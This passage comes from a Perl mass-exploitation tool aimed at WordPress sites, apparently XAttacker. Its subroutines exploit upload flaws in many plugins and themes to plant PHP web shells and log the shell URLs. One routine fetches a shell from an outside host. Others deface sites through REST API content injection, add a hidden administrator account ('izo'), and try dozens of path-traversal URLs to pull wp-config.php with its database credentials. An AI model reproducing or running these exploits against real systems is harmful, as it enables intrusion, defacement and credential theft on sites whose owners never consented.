  3768. print color('bold green'),"+";
  3769. print color('bold red'),"] ";
  3770. print color('bold white'),"Slide Show Pro";
  3771. print color('bold white')," .................... ";
  3772. print color('bold green'),"VULN\n";
  3773. print color('bold green')," [";
  3774. print color('bold red'),"+";
  3775. print color('bold green'),"] ";
  3776. print color('bold white'),"Shell Uploaded Successfully\n";
  3777. print color('bold white'),"  [Link] => $sspup\n";
  3778. open (TEXT, '>>Result/Shells.txt');
  3779. print TEXT "$sspup\n";
  3780. close (TEXT);
  3781. }else{
  3782. print color('bold red'),"[";
  3783. print color('bold green'),"+";
  3784. print color('bold red'),"] ";
  3785. print color('bold white'),"Slide Show Pro";
  3786. print color('bold white')," .................... ";
  3787. print color('bold red'),"Failed\n";
  3788. }
  3789. }
  3790.  
  3791. ################################## WP Mobile Detector ########################################
  3792. ##############################################################################################
  3793. # check the link of the shell or you can upload "wpmobiledetectorshell.zip" on you one shell #
  3794. ##############################################################################################
  3795. sub wpmobiledetector(){
  3796. $wpmdshell = "http://flickr.com.ehpet.net/uploader.php";
  3797. $url = "$site/wp-content/plugins/wp-mobile-detector/resize.php?src=$wpmdshell";
  3798. $wpmdup="$site/wp-content/plugins/wp-mobile-detector/cache/uploader.php";
  3799.  
  3800. my $check = $ua->get("$url");
  3801.  
  3802. my $checkup = $ua->get("$wpmdup")->content;
  3803. if($checkup =~/ZeroByte/) {
  3804. print color('bold red'),"[";
  3805. print color('bold green'),"+";
  3806. print color('bold red'),"] ";
  3807. print color('bold white'),"WP Mobile Detector";
  3808. print color('bold white')," ................ ";
  3809. print color('bold green'),"VULN\n";
  3810. print color('bold green')," [";
  3811. print color('bold red'),"+";
  3812. print color('bold green'),"] ";
  3813. print color('bold white'),"Shell Uploaded Successfully\n";
  3814. print color('bold white'),"  [Link] => $wpmdup\n";
  3815. open (TEXT, '>>Result/Shells.txt');
  3816. print TEXT "$wpmdup\n";
  3817. close (TEXT);
  3818. }else{
  3819. print color('bold red'),"[";
  3820. print color('bold green'),"+";
  3821. print color('bold red'),"] ";
  3822. print color('bold white'),"WP Mobile Detector";
  3823. print color('bold white')," ................ ";
  3824. print color('bold red'),"Failed\n";
  3825. }
  3826. }
  3827.  
  3828. ################ WYSIJA #####################
  3829. sub wysija(){
  3830. $theme = "my-theme";
  3831. my $url = "$site/wp-admin/admin-post.php?page=wysija_campaigns&action=themes";
  3832. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  3833. $ua->timeout(10);
  3834. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  3835.  
  3836.  
  3837. my $wysijares = $ua->post("$url", Content_Type => 'form-data', Content => [ $theme => ['tool/XAttacker.zip', => 'tool/XAttacker.zip'], overwriteexistingtheme => "on",action => "themeupload", submitter => "Upload",]);
  3838. $wysijaup = "$site/wp-content/uploads/wysija/themes/XAttacker/XAttacker.php?X=Attacker";
  3839. my $checkwysija = $ua->get("$wysijaup")->content;
  3840. if($checkwysija =~/X Attacker/) {
  3841. print color('bold red'),"[";
  3842. print color('bold green'),"+";
  3843. print color('bold red'),"] ";
  3844. print color('bold white'),"Wysija";
  3845. print color('bold white')," ............................ ";
  3846. print color('bold green'),"VULN\n";
  3847. print color('bold green')," [";
  3848. print color('bold red'),"+";
  3849. print color('bold green'),"] ";
  3850. print color('bold white'),"Shell Uploaded Successfully\n";
  3851. print color('bold white'),"  [Link] => $wysijaup\n";
  3852. open (TEXT, '>>Result/Shells.txt');
  3853. print TEXT "$wysijaup\n";
  3854. close (TEXT);
  3855. }else{
  3856. print color('bold red'),"[";
  3857. print color('bold green'),"+";
  3858. print color('bold red'),"] ";
  3859. print color('bold white'),"Wysija";
  3860. print color('bold white')," ............................ ";
  3861. print color('bold red'),"Failed\n";
  3862. }
  3863. }
  3864.  
  3865. ################ InBoundio Marketing #####################
  3866. sub inboundiomarketing(){
  3867. my $url = "$site/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php";
  3868. $inbomarketingup = "$site/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/XAttacker.php?X=Attacker";
  3869. my $inbomarketingres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [file => ["tool/XAttacker.php"],]);
  3870.  
  3871. $checkinbomarketing = $ua->get("$inbomarketingup")->content;
  3872. if($checkinbomarketing =~/X Attacker/) {
  3873.  
  3874. print color('bold red'),"[";
  3875. print color('bold green'),"+";
  3876. print color('bold red'),"] ";
  3877. print color('bold white'),"InBoundio Marketing";
  3878. print color('bold white')," ............... ";
  3879. print color('bold green'),"VULN\n";
  3880. print color('bold green')," [";
  3881. print color('bold red'),"+";
  3882. print color('bold green'),"] ";
  3883. print color('bold white'),"Shell Uploaded Successfully\n";
  3884. print color('bold white'),"  [Link] => $inbomarketingup\n";
  3885. open (TEXT, '>>Result/Shells.txt');
  3886. print TEXT "$inbomarketingup\n";
  3887. close (TEXT);
  3888. }else{
  3889. print color('bold red'),"[";
  3890. print color('bold green'),"+";
  3891. print color('bold red'),"] ";
  3892. print color('bold white'),"InBoundio Marketing";
  3893. print color('bold white')," ............... ";
  3894. print color('bold red'),"Failed\n";
  3895. }
  3896. }
  3897.  
  3898.  
  3899. ################ dzs-zoomsounds #####################
  3900. sub dzszoomsounds(){
  3901. my $url = "$site/wp-content/plugins/dzs-zoomsounds/admin/upload.php";
  3902. $dzsup = "$site/wp-content/plugins/dzs-zoomsounds/admin/upload/XAttacker.php?X=Attacker";
  3903. my $dzsres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [file_field => ["tool/XAttacker.php"],]);
  3904.  
  3905. $checkdzsup = $ua->get("$dzsup")->content;
  3906. if($checkdzsup =~/X Attacker/) {
  3907.  
  3908. print color('bold red'),"[";
  3909. print color('bold green'),"+";
  3910. print color('bold red'),"] ";
  3911. print color('bold white'),"dzs-zoomsounds";
  3912. print color('bold white')," .................... ";
  3913. print color('bold green'),"VULN\n";
  3914. print color('bold green')," [";
  3915. print color('bold red'),"+";
  3916. print color('bold green'),"] ";
  3917. print color('bold white'),"Shell Uploaded Successfully\n";
  3918. print color('bold white'),"  [Link] => $dzsup\n";
  3919. open (TEXT, '>>Result/Shells.txt');
  3920. print TEXT "$dzsup\n";
  3921. close (TEXT);
  3922. }else{
  3923. print color('bold red'),"[";
  3924. print color('bold green'),"+";
  3925. print color('bold red'),"] ";
  3926. print color('bold white'),"dzs-zoomsounds";
  3927. print color('bold white')," .................... ";
  3928. print color('bold red'),"Failed\n";
  3929. }
  3930. }
  3931.  
  3932. ################ reflex-gallery #####################/
  3933. sub reflexgallery(){
  3934. my $url = "$site/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=$year&Month=$month";
  3935. $reflexup = "$site/wp-content/uploads/$year/$month/XAttacker.php?X=Attacker";
  3936. my $reflexres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [qqfile => ["tool/XAttacker.php"],]);
  3937.  
  3938. $checkreflexup = $ua->get("$reflexup")->content;
  3939. if($checkreflexup =~/X Attacker/) {
  3940. print color('bold red'),"[";
  3941. print color('bold green'),"+";
  3942. print color('bold red'),"] ";
  3943. print color('bold white'),"Reflex Gallery";
  3944. print color('bold white')," .................... ";
  3945. print color('bold green'),"VULN\n";
  3946. print color('bold green')," [";
  3947. print color('bold red'),"+";
  3948. print color('bold green'),"] ";
  3949. print color('bold white'),"Shell Uploaded Successfully\n";
  3950. print color('bold white'),"  [Link] => $reflexup\n";
  3951. open (TEXT, '>>Result/Shells.txt');
  3952. print TEXT "$reflexup\n";
  3953. close (TEXT);
  3954. }else{
  3955. print color('bold red'),"[";
  3956. print color('bold green'),"+";
  3957. print color('bold red'),"] ";
  3958. print color('bold white'),"Reflex Gallery";
  3959. print color('bold white')," .................... ";
  3960. print color('bold red'),"Failed\n";
  3961. }
  3962. }
  3963.  
  3964.  
  3965. ################ Creative Contact Form #####################
  3966. sub sexycontactform(){
  3967. my $url = "$site/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php";
  3968. $sexycontactup = "$site/wp-content/plugins/sexy-contact-form/includes/fileupload/files/XAttacker.php?X=Attacker";
  3969. my $field_name = "files[]";
  3970.  
  3971. my $sexycontactres = $ua->post( $url,
  3972.             Content_Type => 'form-data',
  3973.             Content => [ $field_name => ["tool/XAttacker.php"] ]
  3974.            
  3975.             );
  3976.  
  3977. $checksexycontactup = $ua->get("$sexycontactup")->content;
  3978. if($checksexycontactup =~/X Attacker/) {
  3979. print color('bold red'),"[";
  3980. print color('bold green'),"+";
  3981. print color('bold red'),"] ";
  3982. print color('bold white'),"Creative Contact Form";
  3983. print color('bold white')," ............. ";
  3984. print color('bold green'),"VULN\n";
  3985. print color('bold green')," [";
  3986. print color('bold red'),"+";
  3987. print color('bold green'),"] ";
  3988. print color('bold white'),"Shell Uploaded Successfully\n";
  3989. print color('bold white'),"  [Link] => $sexycontactup\n";
  3990. open (TEXT, '>>Result/Shells.txt');
  3991. print TEXT "$sexycontactup\n";
  3992. close (TEXT);
  3993. }else{
  3994. print color('bold red'),"[";
  3995. print color('bold green'),"+";
  3996. print color('bold red'),"] ";
  3997. print color('bold white'),"Creative Contact Form";
  3998. print color('bold white')," ............. ";
  3999. print color('bold red'),"Failed\n";
  4000. }
  4001. }
  4002. ################ Realestate tema shell upload #####################
  4003. sub realestate(){
  4004. my $url = "$site/wp-content/themes/Realestate/Monetize/general/upload-file.php";
  4005. $realestateup = "$site/wp-content/themes/Realestate/images/tmp/XAttacker.php?X=Attacker";
  4006. my $field_name = "uploadfile[]";
  4007.  
  4008. my $realestateres = $ua->post( $url,
  4009.             Content_Type => 'form-data',
  4010.             Content => [ $field_name => ["tool/XAttacker.php"] ]
  4011.            
  4012.             );
  4013.  
  4014. $checkrealestateup = $ua->get("$realestateup")->content;
  4015. if($checkrealestateup =~/X Attacker/) {
  4016. print color('bold red'),"[";
  4017. print color('bold green'),"+";
  4018. print color('bold red'),"] ";
  4019. print color('bold white'),"Realestate Tema Uplod";
  4020. print color('bold white')," ............. ";
  4021. print color('bold green'),"VULN\n";
  4022. print color('bold green')," [";
  4023. print color('bold red'),"+";
  4024. print color('bold green'),"] ";
  4025. print color('bold white'),"Shell Uploaded Successfully\n";
  4026. print color('bold white'),"  [Link] => $realestateup\n";
  4027. open (TEXT, '>>Result/Shells.txt');
  4028. print TEXT "$realestateup\n";
  4029. close (TEXT);
  4030. }else{
  4031. print color('bold red'),"[";
  4032. print color('bold green'),"+";
  4033. print color('bold red'),"] ";
  4034. print color('bold white'),"Realestate Tema Uplod";
  4035. print color('bold white')," ............. ";
  4036. print color('bold red'),"Failed\n";
  4037. }
  4038. }
  4039.  
  4040. ################ Work The Flow File Upload #####################
  4041. sub wtffu(){
  4042. my $url = "$site/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/";
  4043. my $shell ="tool/XAttacker.php";
  4044. my $field_name = "files[]";
  4045.  
  4046. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  4047. $wtffup="$site/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/XAttacker.php?X=Attacker";
  4048.  
  4049. $checkwtffup = $ua->get("$wtffup")->content;
  4050. if($checkwtffup =~/X Attacker/) {
  4051. print color('bold red'),"[";
  4052. print color('bold green'),"+";
  4053. print color('bold red'),"] ";
  4054. print color('bold white'),"Work The Flow File Upload";
  4055. print color('bold white')," ......... ";
  4056. print color('bold green'),"VULN\n";
  4057. print color('bold green')," [";
  4058. print color('bold red'),"+";
  4059. print color('bold green'),"] ";
  4060. print color('bold white'),"Shell Uploaded Successfully\n";
  4061. print color('bold white'),"  [Link] => $wtffup\n";
  4062. open (TEXT, '>>Result/Shells.txt');
  4063. print TEXT "$wtffup\n";
  4064. close (TEXT);
  4065. }else{
  4066. print color('bold red'),"[";
  4067. print color('bold green'),"+";
  4068. print color('bold red'),"] ";
  4069. print color('bold white'),"Work The Flow File Upload";
  4070. print color('bold white')," ......... ";
  4071. print color('bold red'),"Failed\n";
  4072. }
  4073. }
  4074.  
  4075. sub brainstorm(){
  4076.  
  4077. my $url = "$site/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php";
  4078. my $shell ="tool/XAttacker.php";
  4079. my $field_name = "Filedata";
  4080.  
  4081. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  4082.  
  4083. $fuildupz="$site/wp-content/uploads/2018/01/XAttacker.php?X=Attacker";
  4084.  
  4085. my $checkblocktestimonial = $ua->get("$fuildupz")->content;
  4086. if($checkblocktestimonial =~/X Attacker/) {
  4087. print color('bold red'),"[";
  4088. print color('bold green'),"+";
  4089. print color('bold red'),"] ";
  4090. print color('bold white'),"brainstorm";
  4091. print color('bold white')," ........................ ";
  4092. print color('bold green'),"VULN";
  4093. print color('bold white'),"\n";
  4094. print color('bold green')," [";
  4095. print color('bold red'),"+";
  4096. print color('bold green'),"] ";
  4097. print color('bold white'),"Shell Uploaded Successfully\n";
  4098. print color('bold white'),"  [Link] => $fuildupz\n";
  4099. open (TEXT, '>>Result/Shells.txt');
  4100. print TEXT "$fuildupz\n";
  4101. close (TEXT);
  4102. }else{
  4103. print color('bold red'),"[";
  4104. print color('bold green'),"+";
  4105. print color('bold red'),"] ";
  4106. print color('bold white'),"brainstorm";
  4107. print color('bold white')," ........................ ";
  4108. print color('bold red'),"Failed";
  4109. print color('bold white'),"\n";
  4110. }
  4111. }
  4112.  
  4113. ################ WP Job Manger #####################
  4114. sub wpjm(){
  4115. my $url = "$site/jm-ajax/upload_file/";
  4116. my $image ="tool/XAttacker.php";
  4117. my $field_name = "file[]";
  4118.  
  4119. my $response = $ua->post( $url,
  4120.             Content_Type => 'form-data',
  4121.             Content => [ $field_name => ["$image"] ]
  4122.            
  4123.             );
  4124.  
  4125. $jobmangerup = "$site/wp-content/uploads/job-manager-uploads/file/$year/$month/XAttacker.gif";
  4126. $checkpofwup = $ua->get("$jobmangerup")->content_type;
  4127. if($checkpofwup =~/image\/gif/) {
  4128. print color('bold red'),"[";
  4129. print color('bold green'),"+";
  4130. print color('bold red'),"] ";
  4131. print color('bold white'),"WP Job Manger";
  4132. print color('bold white')," ..................... ";
  4133. print color('bold green'),"VULN\n";
  4134. print color('bold green')," [";
  4135. print color('bold red'),"+";
  4136. print color('bold green'),"] ";
  4137. print color('bold white'),"Picture Uploaded Successfully\n";
  4138. print color('bold white'),"  [Link] => $jobmangerup\n";
  4139. print color('bold green'),"  [";
  4140. print color('bold red'),"-";
  4141. print color('bold green'),"] ";
  4142. open (TEXT, '>>Result/index.txt');
  4143. print TEXT "$jobmangerup\n";
  4144. close (TEXT);
  4145. }else{
  4146. print color('bold red'),"[";
  4147. print color('bold green'),"+";
  4148. print color('bold red'),"] ";
  4149. print color('bold white'),"WP Job Manger";
  4150. print color('bold white')," ..................... ";
  4151. print color('bold red'),"Failed\n";
  4152. }
  4153. }
  4154.  
  4155. ################  PHP Event Calendar #####################
  4156. sub phpeventcalendar(){
  4157. my $url = "$site/wp-content/plugins/php-event-calendar/server/file-uploader/";
  4158. my $shell ="tool/XAttacker.php";
  4159. my $field_name = "files[]";
  4160.  
  4161. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  4162. $phpevup="$site/wp-content/plugins/php-event-calendar/server/file-uploader/XAttacker.php?X=Attacker";
  4163.  
  4164. if ($response->content =~ /{"files/) {
  4165. print color('bold red'),"[";
  4166. print color('bold green'),"+";
  4167. print color('bold red'),"] ";
  4168. print color('bold white'),"PHP Event Calendar";
  4169. print color('bold white')," ................ ";
  4170. print color('bold green'),"VULN\n";
  4171. print color('bold green')," [";
  4172. print color('bold red'),"+";
  4173. print color('bold green'),"] ";
  4174. print color('bold white'),"Shell Uploaded Successfully\n";
  4175. print color('bold white'),"  [Link] => $phpevup\n";
  4176. open (TEXT, '>>Result/Shells.txt');
  4177. print TEXT "$phpevup\n";
  4178. close (TEXT);
  4179. }else{
  4180. print color('bold red'),"[";
  4181. print color('bold green'),"+";
  4182. print color('bold red'),"] ";
  4183. print color('bold white'),"PHP Event Calendar";
  4184. print color('bold white')," ................ ";
  4185. print color('bold red'),"Failed\n";
  4186. }
  4187. }
  4188.  
  4189. ################  PHP Event Calendar #####################
  4190. sub phpeventcalendars(){
  4191. my $url = "$site/wp-admin/admin-ajax.php";
  4192.  
  4193.  
  4194. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [filename => ["tool/XAttacker.php"], gcb_view => 'update', update_it => '1',  gcb_name => 'Foo', gcb_custom_id => '', gcb_type => 'php', gcb_description => '', gcbvalue => '$shell', gcb_updateshortcode => 'Update',]);
  4195. $phpevup="$site/wp-content/uploads/2018/02/XAttacker.php?X=Attacker";
  4196.  
  4197. if ($response->content =~ /{"files/) {
  4198. print color('bold red'),"[";
  4199. print color('bold green'),"+";
  4200. print color('bold red'),"] ";
  4201. print color('bold white'),"File Manager Plugin";
  4202. print color('bold white')," ............... ";
  4203. print color('bold green'),"VULN\n";
  4204. print color('bold green')," [";
  4205. print color('bold red'),"+";
  4206. print color('bold green'),"] ";
  4207. print color('bold white'),"Shell Uploaded Successfully\n";
  4208. print color('bold white'),"  [Link] => $phpevup\n";
  4209. open (TEXT, '>>Result/Shells.txt');
  4210. print TEXT "$phpevup\n";
  4211. close (TEXT);
  4212. }else{
  4213. print color('bold red'),"[";
  4214. print color('bold green'),"+";
  4215. print color('bold red'),"] ";
  4216. print color('bold white'),"File Manager Plugin";
  4217. print color('bold white')," ............... ";
  4218. print color('bold red'),"Failed\n";
  4219. }
  4220. }
  4221.  
  4222. ################ Synoptic #####################
  4223. sub synoptic(){
  4224. my $url = "$site/wp-content/themes/synoptic/lib/avatarupload/upload.php";
  4225. my $shell ="tool/XAttacker.php";
  4226. my $field_name = "qqfile";
  4227.  
  4228. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  4229. $Synopticup="$site/wp-content/uploads/markets/avatars/XAttacker.php?X=Attacker";
  4230.  
  4231. $checkSynopticup = $ua->get("$Synopticup")->content;
  4232. if($checkSynopticup =~/X Attacker/) {
  4233. print color('bold red'),"[";
  4234. print color('bold green'),"+";
  4235. print color('bold red'),"] ";
  4236. print color('bold white'),"Synoptic";
  4237. print color('bold white')," .......................... ";
  4238. print color('bold green'),"VULN\n";
  4239. print color('bold green')," [";
  4240. print color('bold red'),"+";
  4241. print color('bold green'),"] ";
  4242. print color('bold white'),"Shell Uploaded Successfully\n";
  4243. print color('bold white'),"  [Link] => $Synopticup\n";
  4244. open (TEXT, '>>Result/Shells.txt');
  4245. print TEXT "$Synopticup\n";
  4246. close (TEXT);
  4247. }else{
  4248. print color('bold red'),"[";
  4249. print color('bold green'),"+";
  4250. print color('bold red'),"] ";
  4251. print color('bold white'),"Synoptic";
  4252. print color('bold white')," .......................... ";
  4253. print color('bold red'),"Failed\n";
  4254. }
  4255. }
  4256.  
  4257. ################ U-Design #####################
  4258. sub udesig(){
  4259. my $url = "$site/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php";
  4260. my $shell ="tool/XAttacker.php";
  4261. my $field_name = "Filedata";
  4262.  
  4263. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  4264. $udesigup="$site/wp-content/themes/u-design/scripts/admin/uploadify/XAttacker.php?X=Attacker";
  4265.  
  4266. $checkudesigup = $ua->get("$udesigup")->content;
  4267. if($checkudesigup =~/X Attacker/) {
  4268. print color('bold red'),"[";
  4269. print color('bold green'),"+";
  4270. print color('bold red'),"] ";
  4271. print color('bold white'),"U-design";
  4272. print color('bold white')," .......................... ";
  4273. print color('bold green'),"VULN\n";
  4274. print color('bold green')," [";
  4275. print color('bold red'),"+";
  4276. print color('bold green'),"] ";
  4277. print color('bold white'),"Shell Uploaded Successfully\n";
  4278. print color('bold white'),"  [Link] => $udesigup\n";
  4279. open (TEXT, '>>Result/Shells.txt');
  4280. print TEXT "$udesigup\n";
  4281. close (TEXT);
  4282. }else{
  4283. print color('bold red'),"[";
  4284. print color('bold green'),"+";
  4285. print color('bold red'),"] ";
  4286. print color('bold white'),"U-design";
  4287. print color('bold white')," .......................... ";
  4288. print color('bold red'),"Failed\n";
  4289. }
  4290. }
  4291. ################ work-the-flow-file-upload #####################
  4292. sub workf(){
  4293. my $url = "$site/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php";
  4294. my $shell ="tool/XAttacker.php";
  4295. my $field_name = "files[]";
  4296.  
  4297. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  4298. $workfup="$site/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/XAttacker.php?X=Attacker";
  4299.  
  4300. $checkworkfup = $ua->get("$udesigup")->content;
  4301. if($checkworkfup =~/X Attacker/) {
  4302. print color('bold red'),"[";
  4303. print color('bold green'),"+";
  4304. print color('bold red'),"] ";
  4305. print color('bold white'),"workflow";
  4306. print color('bold white')," .......................... ";
  4307. print color('bold green'),"VULN\n";
  4308. print color('bold green')," [";
  4309. print color('bold red'),"+";
  4310. print color('bold green'),"] ";
  4311. print color('bold white'),"Shell Uploaded Successfully\n";
  4312. print color('bold white'),"  [Link] => $workfup\n";
  4313. open (TEXT, '>>Result/Shells.txt');
  4314. print TEXT "$workfup\n";
  4315. close (TEXT);
  4316. }else{
  4317. print color('bold red'),"[";
  4318. print color('bold green'),"+";
  4319. print color('bold red'),"] ";
  4320. print color('bold white'),"workflow";
  4321. print color('bold white')," .......................... ";
  4322. print color('bold red'),"Failed\n";
  4323. }
  4324. }
  4325.  
  4326. ################ Wpshop #####################
  4327. sub Wpshop(){
  4328. my $url = "$site/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload";
  4329. my $shell ="tool/XAttacker.php";
  4330. my $field_name = "wpshop_file";
  4331.  
  4332. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  4333. $wpshopup="$site/wp-content/uploads/XAttacker.php?X=Attacker";
  4334.  
  4335. $checkwpshopup = $ua->get("$wpshopup")->content;
  4336. if($checkwpshopup =~/X Attacker/) {
  4337.  
  4338. print color('bold red'),"[";
  4339. print color('bold green'),"+";
  4340. print color('bold red'),"] ";
  4341. print color('bold white'),"Wp Shop";
  4342. print color('bold white')," ........................... ";
  4343. print color('bold green'),"VULN\n";
  4344. print color('bold green')," [";
  4345. print color('bold red'),"+";
  4346. print color('bold green'),"] ";
  4347. print color('bold white'),"Shell Uploaded Successfully\n";
  4348. print color('bold white'),"  [Link] => $wpshopup\n";
  4349. open (TEXT, '>>Result/Shells.txt');
  4350. print TEXT "$wpshopup\n";
  4351. close (TEXT);
  4352. }else{
  4353. print color('bold red'),"[";
  4354. print color('bold green'),"+";
  4355. print color('bold red'),"] ";
  4356. print color('bold white'),"Wp Shop";
  4357. print color('bold white')," ........................... ";
  4358. print color('bold red'),"Failed\n";
  4359. }
  4360. }
  4361. # this exploit Content Injection coded by fallag gassrini <3
  4362. ################ Content Injection #####################
  4363. sub wpinjection(){
  4364. $linkposts = $site . '/index.php/wp-json/wp/v2/posts/';
  4365.  
  4366. $sorm = $ua->get($linkposts);
  4367. $karza = $sorm->content;
  4368. if($karza =~/\/?p=(.*?)\"\}/)
  4369. {
  4370. $id=$1;
  4371.  
  4372. $ajx = $site . '/index/wp-json/wp/v2/posts/'.$id;
  4373.  
  4374. $sirina=$id . 'justrawdata';
  4375. $index='<p align="center"><img border="0" src="http://vignette4.wikia.nocookie.net/trollpasta/images/3/34/Fuck-you-cartoon-meme.gif" width="339" height="476"></p><pre>&nbsp;</pre><div align="center"><p align="center" class="auto-style2">
  4376.     <font face="Bradley Hand ITC" size="6">HaCkEd By Mohamed Riahi</font></p>
  4377.     <p align="center" class="auto-style2">';
  4378. $gassface = POST $ajx, [
  4379. 'id' => $sirina, 'slug' => '/m.htm', 'title' => 'HaCkEd By Mohamed Riahi ', 'content' => $index];
  4380. $response = $ua->request($gassface);
  4381. $stat = $response->content;
  4382.     if ($stat =~ /HaCkEd/){
  4383. $urljson = "$site/m.htm";
  4384. $link = $ua->get($site);
  4385. $link = $link->request->uri;
  4386. print color('bold red'),"[";
  4387. print color('bold green'),"+";
  4388. print color('bold red'),"] ";
  4389. print color('bold white'),"Content Injection";
  4390. print color('bold white')," ................. ";
  4391. print color('bold green'),"VULN\n";
  4392. print color('bold green')," [";
  4393. print color('bold red'),"+";
  4394. print color('bold green'),"] ";
  4395. print color('bold white'),"Injected Successfully\n";
  4396. print color('bold white'),"  [Link] => $urljson\n";
  4397. open (TEXT, '>>Result/index.txt');
  4398. print TEXT "$urljson\n";
  4399. close (TEXT);
  4400. }else{
  4401. print color('bold red'),"[";
  4402. print color('bold green'),"+";
  4403. print color('bold red'),"] ";
  4404. print color('bold white'),"Content Injection";
  4405. print color('bold white')," ................. ";
  4406. print color('bold red'),"Failed\n";
  4407. }
  4408. }
  4409. }
  4410.  
  4411. ################ 0day admin  #####################
  4412. sub adad(){
  4413. $url = "$site/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=izo&user_pass=izoizo&user_email=sercany92%40gmail.com&role=administrator";
  4414.  
  4415. $resp = $ua->request(HTTP::Request->new(GET => $url ));
  4416. $conttt = $resp->content;
  4417. if($conttt =~ m/success/g){
  4418. print color('bold red'),"[";
  4419. print color('bold green'),"+";
  4420. print color('bold red'),"] ";
  4421. print color('bold white'),"0day admin adding";
  4422. print color('bold white')," .............. ";
  4423. print color('bold green'),"VULN\n";
  4424. print color('bold white'),"Injected Successfully\n";
  4425. print color('bold white'),"[Link] => [User]= izo [Pass]= izoizo Login : $site/wp-login.php\n";
  4426.      open(save, '>>Result/adad.txt');  
  4427.     print save "[adad] $url\n";  
  4428.     close(save);
  4429. }else{
  4430. print color('bold red'),"[";
  4431. print color('bold green'),"+";
  4432. print color('bold red'),"] ";
  4433. print color('bold white'),"0day admin adding";
  4434. print color('bold white')," ................. ";
  4435. print color('bold red'),"Failed\n";
  4436. }
  4437. }
  4438.  
  4439. ###### WP LFD SCAN ######
  4440. ######################
  4441. ######################
  4442. ######################
  4443. sub wplfd(){
  4444. print color('bold red'),"[";
  4445. print color('bold green'),"+";
  4446. print color('bold red'),"] ";
  4447. print color('bold white'),"LFD and Config Backup";
  4448. print color('bold white')," ............. ";
  4449. print color('bold red'),"FiNDiNGG\n";
  4450. @patik=('/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes','/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php','/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download','/wp-content/themes/yakimabait/download.php?file=./wp-config.php','/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php','/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php','/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php','/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php','/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php','/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00','/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=../../../../../../../wp-config.php','/wp-content/plugins/abtest/abtest_admin.php?action=../../../../wp-config','/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=../../wp-config.php','/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php','/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=../../../../wp-config.php','/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php','/wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../../../../../wp-config.php%00','/wp-content/themes/twentyeleven/download.php?file=%2Fwp-config.php','/wp-content/themes/twentyeleven/download.php?file=../../../wp-config.php','/wp-content/themes/twentyeleven/download.php?filename=../../../../../wp-config.php','/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php','/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php','/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php','/wp-content/plugins//hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10','/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php','/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php','/wp-content/themes/liberator/inc/php/download.php?download_file=../wp-config.php','/wp-content/themes/kap/download.php?url=..%2Fwp-config.php','/wp-content/themes/duena/download.php?f=../wp-config.php','/wp-content/themes/endlesshorizon/download.php?file=../../../wp-config.php','/wp-content/plugins/photocart-link/decode.php?id=Li4vLi4vLi4vd3AtY29uZmlnLnBocA==','/wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php','/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10','$site/wp-content/plugins/sf-booking/lib/downloads.php?file=$site/wp-config.php','/wp-content/plugins/sf-booking/lib/downloads.php?file=/wp-config.php','/